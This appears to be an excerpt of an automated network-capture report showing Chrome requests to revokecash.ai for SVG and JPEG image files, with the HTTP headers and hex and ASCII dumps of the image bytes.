                                                                          2023-12-10 16:44:32 UTC658INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 31 30 35 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 37 20 31 30 35 22 20 77 69 64 74 68 3d 22 32 34 37 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 64 3d 22 6d 32 30 20 32 30 68 36 35 76 36 35 68 2d 36 35 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 72 65 63 74 20 66 69 6c 6c 3d 22 23 30 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 35 22 20 72 78 3d 22 31 32 2e 39 38 37 37 22 20 77 69 64 74 68 3d 22 32 34 36 2e 30
                                                                          Data Ascii: <svg fill="none" height="105" viewBox="0 0 247 105" width="247" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><clipPath id="a"><path d="m20 20h65v65h-65z"/></clipPath><rect fill="#000" height="105" rx="12.9877" width="246.0
                                                                          2023-12-10 16:44:32 UTC1369INData Raw: 20 32 32 2e 33 39 35 37 76 37 2e 36 6c 2d 35 2e 34 2d 37 2e 36 68 2d 32 2e 34 76 31 34 68 33 2e 32 76 2d 37 2e 36 6c 35 2e 34 20 37 2e 36 68 32 2e 34 76 2d 31 34 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 31 39 2e 38 37 38 20 33 36 2e 36 37 35 37 63 34 2e 30 32 20 30 20 37 2e 32 38 2d 33 2e 31 36 20 37 2e 32 38 2d 37 2e 32 38 73 2d 33 2e 32 36 2d 37 2e 32 38 2d 37 2e 32 38 2d 37 2e 32 38 2d 37 2e 32 38 20 33 2e 31 36 2d 37 2e 32 38 20 37 2e 32 38 20 33 2e 32 36 20 37 2e 32 38 20 37 2e 32 38 20 37 2e 32 38 7a 6d 30 2d 33 2e 31 32 63 2d 32 2e 32 38 20 30 2d 34 2e 30 38 2d 31 2e 36 36 2d 34 2e 30 38 2d 34 2e 31 36 73 31 2e 38 2d 34 2e 31 36 20 34 2e 30 38 2d 34 2e 31 36 20 34 2e 30 38 20 31 2e 36 36 20 34 2e 30 38 20 34 2e 31 36 2d 31 2e 38 20 34 2e 31 36
                                                                          Data Ascii: 22.3957v7.6l-5.4-7.6h-2.4v14h3.2v-7.6l5.4 7.6h2.4v-14z"/><path d="m119.878 36.6757c4.02 0 7.28-3.16 7.28-7.28s-3.26-7.28-7.28-7.28-7.28 3.16-7.28 7.28 3.26 7.28 7.28 7.28zm0-3.12c-2.28 0-4.08-1.66-4.08-4.16s1.8-4.16 4.08-4.16 4.08 1.66 4.08 4.16-1.8 4.16
                                                                          2023-12-10 16:44:32 UTC932INData Raw: 35 31 2d 32 39 2e 31 36 32 31 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 32 30 2e 38 33 31 20 38 32 2e 38 38 34 36 76 2d 33 38 2e 32 30 38 38 68 31 32 2e 36 36 35 76 34 2e 36 32 39 37 68 2d 37 2e 35 35 36 76 31 31 2e 36 30 31 68 36 2e 37 30 35 76 34 2e 36 32 39 38 68 2d 36 2e 37 30 35 76 31 32 2e 37 31 38 35 68 37 2e 35 35 36 76 34 2e 36 32 39 38 7a 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 33 37 2e 31 34 39 20 34 34 2e 36 37 35 38 68 31 30 2e 30 30 35 63 33 2e 39 30 32 20 30 20 35 2e 38 35 33 20 32 2e 31 38 31 38 20 35 2e 38 35 33 20 36 2e 35 34 35 35 76 39 2e 34 31 39 31 63 30 20 33 2e 33 33 34 39 2d 31 2e 30 31 31 20 35 2e 34 34 35 38 2d 33 2e 30 33 33 20 36 2e 33 33 32 37 6c 33 2e 35 36 35 20 31 35 2e 39 31 31 35 68 2d 34 2e 38 34 32 6c 2d 33 2e 33
                                                                          Data Ascii: 51-29.1621z"/><path d="m120.831 82.8846v-38.2088h12.665v4.6297h-7.556v11.601h6.705v4.6298h-6.705v12.7185h7.556v4.6298z"/><path d="m137.149 44.6758h10.005c3.902 0 5.853 2.1818 5.853 6.5455v9.4191c0 3.3349-1.011 5.4458-3.033 6.3327l3.565 15.9115h-4.842l-3.3


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          67192.168.2.549794172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC348OUTGET /_img/en.svg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:32 UTC710INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 35 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 31 66 63 2d 31 38 63 35 33 33 32 35 61 31 63 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:31 GMTContent-Type: image/svg+xmlContent-Length: 508Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"1fc-18c53325a1c"
                                                                          2023-12-10 16:44:32 UTC508INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 31 32 20 35 31 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 30 68 35 31 32 76 35 31 32 68 2d 35 31 32 7a 22 20 66 69 6c 6c 3d 22 23 30 31 32 31 36 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 35 31 32 20 30 76 36 34 6c 2d 31 39 30 20 31 39 32 20 31 39 30 20 31 38 37 76 36 39 68 2d 36 37 6c 2d 31 39 31 2d 31 38 38 2d 31 38 36 20 31 38 38 68 2d 36 38 76 2d 36 38 6c 31 38 36 2d 31 38 37 2d 31 38 36 2d 31 38 33 76 2d 37 34 68 36 32 6c 31 39 32 20 31 38 38 20 31 38 36 2d 31 38 38 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 31 38 34 20 33 32 34 20 31 31 20 33 34 2d 31 35
                                                                          Data Ascii: <svg viewBox="0 0 512 512" xmlns="http://www.w3.org/2000/svg"><path d="m0 0h512v512h-512z" fill="#012169"/><path d="m512 0v64l-190 192 190 187v69h-67l-191-188-186 188h-68v-68l186-187-186-183v-74h62l192 188 186-188z" fill="#fff"/><path d="m184 324 11 34-15


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          68192.168.2.549793172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC352OUTGET /_img/vulcan.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:31 UTC712INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 30 33 36 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 32 38 37 66 2d 31 38 63 35 33 33 32 35 62 62 38 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:31 GMTContent-Type: image/jpegContent-Length: 10367Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"287f-18c53325bb8"
                                                                          2023-12-10 16:44:31 UTC657INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20
                                                                          Data Ascii: www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 28 d4 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45 12 45 55 45 9a 45 de 46
                                                                          Data Ascii: ())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: da 00 0c 03 01 00 02 11 03 11 00 00 01 a6 0e d9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 ed 5e 2f 79 b3 1d 90 5c 76 49 71 99 31 18 e2 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5a 6a d6 1f 57 9f 73 f5 ac ae ed 76 fa a3 b1 da f7 e9 40 9c f5 e8 18 1e 7e 97 d1 46 d9 6b 6f 7c 3c da 4a fd b2 a7 ad 07 3e 63 3c c0 6c f0 17 cc 21 eb 9c 6b 19 d8 20 00 1b 6b a6 6f 35 5a 6a da 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 eb e7 79 a9 8d ad 89 2c 4d c4 7a f3 49 f3 de 68 fc 9d 2e 39 1e
                                                                          Data Ascii: ^/y\vIq1@ZjWsv@~Fko|<J>c<l!k ko5Zjy,MzIh.9
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 70 18 ec 7e f8 72 1e 97 84 b6 a2 58 9b c4 ce f1 90 85 b5 cd 2a e1 74 3d a0 c6 9d b0 a1 09 59 31 47 88 f0 b6 e8 d1 5d f7 c8 8b 3d 38 52 37 07 ac e8 db d0 f0 83 ee 42 59 72 78 83 f1 5d d1 69 07 42 82 e8 67 f0 c1 77 25 a4 5c 9c 25 1b ac 7a c8 66 58 5b 44 cf 6d db 65 f5 53 1c 8e 54 5b c6 d1 fa 5a 22 2c 96 59 82 98 99 ed bb 95 dc 8c 17 73 59 33 b8 11 c7 ce 5f 1b 9b dd 8e 8e d0 1f bf 18 97 a6 50 93 3b 18 16 f5 99 de 12 0c b6 bd 8d 37 61 46 0f 64 c6 15 87 85 b6 c6 98 5f 7c 88 b3 d4 cf a9 c3 21 8a 12 70 6b 21 18 b4 22 79 1c 28 6b 15 dd 16 7f a1 41 74 33 f8 60 bb 92 d2 3e 46 3b b7 22 e2 f1 31 5e 31 15 25 85 ed 6b 2a d2 6c 9e ad 6a bd 6d 55 dc 8c 17 73 5a 45 f1 fe 21 cb 33 a2 fb 00 a5 3d 12 84 9a 4c 68 5b d4 ce f0 94 62 f3 98 a2 c4 68 5b 6b 57 1b ef 95 f3 fa 1a 3e
                                                                          Data Ascii: p~rX*t=Y1G]=8R7BYrx]iBgw%\%zfX[DmeST[Z",YsY3_P;7aFd_|!pk!"y(kAt3`>F;"1^1%k*ljmUsZE!3=Lh[bh[kW>
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 69 ab 3f 6c fc f6 7d 92 eb 34 63 a7 da dd bc cb 26 8b 4b 29 98 66 ae 8c 31 3a 3a 4f ad b5 ee 2d 1c db 32 ce 4f 56 62 99 8a 5f 25 b8 f5 54 5f 66 a6 41 d2 2d 69 67 f2 31 be d5 5c c2 56 ec c3 aa 8a 3c 42 3c c1 47 91 12 e0 47 95 85 1e 61 4b 6d 4c c3 a2 a5 1c 72 5a df 60 a1 fc 44 14 53 f6 91 7a 95 23 15 e2 c9 d1 8d e7 7d b6 25 57 6c d8 74 70 8e 3a 9f 61 42 bc 14 53 f6 90 4f 94 fa 58 5e 2a f3 96 48 5d 35 a5 07 ae 5a 05 64 ff 00 c1 9f 9f b3 ec 97 5a 1d 25 3e df dc ba c9 a2 cf 29 a3 a3 a6 fa db 5e e3 0c 73 6c f8 9e ac c5 23 14 be 48 f5 ae b5 44 2a ad ab 31 c6 5a 49 59 8a 2b 44 4e a6 dd 10 51 e2 11 e6 0a 3c 88 97 02 3c ac 28 f3 14 39 10 56 52 d7 1b 0b d6 a7 35 e2 c2 9f cc 2a e2 db a1 62 37 d6 c4 f9 4f a5 85 1e 2c 23 c0 ad c8 cf 70 59 e7 0f b1 75 9a 31 d3 ed ee de
                                                                          Data Ascii: i?l}4c&K)f1::O-2OVb_%T_fA-ig1\V<B<GGaKmLrZ`DSz#}%Wltp:aBSOX^*H]5ZdZ%>)^sl#HD*1ZIY+DNQ<<(9VR5*b7O,#pYu1
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: aa 1d cc 45 06 d7 c2 16 da 9e 81 f4 22 6f d8 93 c2 54 d1 f5 f0 06 bf 14 3d c2 69 56 2a ba 79 8f 48 d4 b7 55 03 0a 4a 21 10 91 ca 03 0e 73 a0 c3 58 5b 50 24 44 a9 9b b8 a7 b1 85 0d 4a 86 a4 4a 33 d4 a1 b0 a7 8f 79 26 0f 8c 29 74 54 c8 c3 08 39 ae 85 a2 0a 3b 8e 23 a1 de 32 15 8f c0 5e 23 85 96 a6 59 a2 6a 81 7e db 89 ce 52 f7 aa 1e 69 31 6c 0b e8 1f 47 38 41 ed 88 e2 65 32 98 c4 21 86 65 d6 de 04 db 26 d0 d5 53 42 79 27 1d 42 06 35 11 76 c6 5f 0e 4c d1 ca 03 0e 73 a0 d5 b3 16 09 90 bc d6 ad 52 3c 1b 53 c9 8b 62 32 89 f2 3f 63 90 d3 cd 64 25 ea 60 08 73 12 4b 16 21 4c 94 ec d1 dd 32 2d 10 71 dc 71 07 78 c8 56 3f 02 d9 d9 70 a6 88 e5 ac cf 48 a0 3f 73 ea 29 9b 42 4b 0b 95 51 a8 67 8a 5b 48 b3 4e a8 92 12 d0 67 b4 90 2e 04 e0 28 49 58 86 d5 0e 36 23 19 50 0d
                                                                          Data Ascii: E"oT=iV*yHUJ!sX[P$DJJ3y&)tT9;#2^#Yj~Ri1lG8Ae2!e&SBy'B5v_LsR<Sb2?cd%`sK!L2-qqxV?pH?s)BKQg[HNg.(IX6#P
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 50 cb c8 ef d4 e9 22 ee b8 91 12 93 99 af d0 39 2c 49 77 68 3d 73 eb 33 34 a8 cf 0d cc a7 d0 49 e1 a8 4d da 6c 65 1e b8 f4 93 49 dc 31 df 20 7e 59 fa 7b 2f 04 92 ff 00 a8 56 c8 5c 3e 2e b1 10 11 29 1d a7 ce 25 72 16 57 ed 05 2f 5a 1a 13 65 5d 60 60 09 7a 47 47 3a 4a c4 6a 31 c2 55 31 92 46 4c 04 c0 78 d4 4d a8 e3 7a e0 fc bd 21 ee 19 07 08 c7 00 58 51 74 e5 7b 91 10 29 46 a2 6a 4a 89 71 b7 4d 07 bc d9 71 1d 55 ac af 75 83 f9 d7 6c 05 b1 12 fa 65 00 d0 bb 61 3f de c1 7c 0c 66 db d2 88 b4 5b 34 3d b2 1b 16 59 ba 57 e6 ca 9e 84 3b 53 7f b6 49 2f 95 6f 32 06 07 2b a1 eb 2f c8 74 b2 7a d0 46 bc 86 2d f5 cc 3e 01 56 bf 93 fd 35 90 99 6d 95 a5 f6 4f 2d 60 e4 23 26 8f ac 0f 77 6a 96 bc de 19 89 80 c2 5f 24 58 57 aa 4b 41 6c 1d 06 f6 98 6b 9a eb 3f de c2 f1 74 b8
                                                                          Data Ascii: P"9,Iwh=s34IMleI1 ~Y{/V\>.)%rW/Ze]``zGG:Jj1U1FLxMz!XQt{)FjJqMqUulea?|f[4=YW;SI/o2+/tzF->V5mO-`#&wj_$XWKAlk?t
                                                                          2023-12-10 16:44:31 UTC127INData Raw: 43 63 81 d4 67 d0 ee c2 17 ca b9 3a 74 95 11 2e bf cb ac ff 00 c6 55 2a 7f c2 d4 ff 00 8c a9 52 54 f0 a9 52 a5 4a 95 2a 54 a9 52 a7 ea a9 f5 6a 95 2a 78 54 a9 15 2a 54 a9 52 a5 4a 95 2a 54 8a 95 2a 78 d4 a9 f5 6a 95 2a 54 a9 fb d5 25 44 95 3c 2a 7d 3e a5 4f 0a 95 2a 54 a9 fc 1a 95 2a 54 4c c4 95 2a 7d 34 2e 54 f0 08 12 a4 a9 50 25 4f de a9 52 54 a9 12 54 67 85 4f e2 ff 00 ff d9
                                                                          Data Ascii: Ccg:t.U*RTRJ*TRj*xT*TRJ*T*xj*T%D<*}>O*T*TL*}4.TP%ORTTgO


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          69192.168.2.549795172.67.152.1054435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:31 UTC353OUTGET /_img/premint.jpg HTTP/1.1
                                                                          Host: revokecash.ai
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:31 UTC720INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 33 31 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 36 36 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 45 78 70 72 65 73 73 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 31 34 34 30 30 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 30 3a 30 37 3a 33 38 20 47 4d 54 0d 0a 45 54 61 67 3a 20 57 2f 22 34 31 31 35 2d 31 38 63 35 33 33 32 35 62 62 30 22
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:44:31 GMTContent-Type: image/jpegContent-Length: 16661Connection: closeX-Powered-By: ExpressCache-Control: public, max-age=14400Last-Modified: Sun, 10 Dec 2023 10:07:38 GMTETag: W/"4115-18c53325bb0"
                                                                          2023-12-10 16:44:31 UTC649INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64
                                                                          Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@d
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73 63 00 00 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20
                                                                          Data Ascii: http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference
                                                                          2023-12-10 16:44:31 UTC1369INData Raw: 28 0d 28 3f 28 71 28 a2 28 d4 29 06 29 38 29 6b 29 9d 29 d0 2a 02 2a 35 2a 68 2a 9b 2a cf 2b 02 2b 36 2b 69 2b 9d 2b d1 2c 05 2c 39 2c 6e 2c a2 2c d7 2d 0c 2d 41 2d 76 2d ab 2d e1 2e 16 2e 4c 2e 82 2e b7 2e ee 2f 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38 50 38 8c 38 c8 39 05 39 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43 7d 43 c0 44 03 44 47 44 8a 44 ce 45
                                                                          Data Ascii: ((?(q(())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDE
